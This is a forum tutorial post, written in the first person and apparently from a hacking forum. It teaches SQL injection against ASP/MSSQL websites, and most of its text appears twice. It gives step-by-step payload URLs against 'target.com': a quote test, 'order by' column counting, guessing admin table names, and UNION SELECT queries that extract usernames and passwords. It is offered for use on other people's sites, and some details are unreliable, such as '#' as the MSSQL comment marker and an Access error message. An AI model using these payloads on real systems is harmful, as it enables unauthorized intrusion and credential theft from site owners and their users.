MSSQL [asp] Sql injection
Ok guys i'm gonna give u a tut on Sql injection this is written by me!
The sql injection on asp is same as on php...but a little bit of changes are made...
So first of all we will find some site that is Vulnerable and is on .asp
So assume that u got a site with the name of
now find page where the site is vul to sql injection...
You can check the Vulnerability by adding single quotation '
at the end of URL like
If u get this error...
Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #
Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...
So we will have an error on this query
But when we will use this query, we will not get any error.
This tells us that the table has 10 columns.
Now we will write the query as...
So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like
After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...
So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,
Now our URL will look like
Suppose we got a username instead of the number 3.
and then change column name with passwords column name
you will get the password ;)
URL will be like
Hopes i will helped you , in this type of injection we don't get much working scripts to get tables etc if i get working ones i will update this tut soon ... by me for HF , enjoy !!
Having Problem in tut? Ask questions here :)
The sql injection on asp is same as on php...but a little bit of changes are made...
So first of all we will find some site that is Vulnerable and is on .asp
So assume that u got a site with the name of
Code:
http://www.target.com/
now find page where the site is vul to sql injection...
You can check the Vulnerability by adding single quotation '
at the end of URL like
Code:
http://www.target.com/product.asp?id=13'
If u get this error...
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.
/deptdet.asp, line 122
Code:
http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...
So we will have an error on this query
Code:
http://www.target.com/product.asp?id=13 order by 11#
But when we will use this query, we will not get any error.
Code:
http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.
Now we will write the query as...
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#
After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...
So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,
Now our URL will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
and then change column name with passwords column name
you will get the password ;)
URL will be like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Hopes i will helped you , in this type of injection we don't get much working scripts to get tables etc if i get working ones i will update this tut soon ... by me for HF , enjoy !!
Having Problem in tut? Ask questions here :)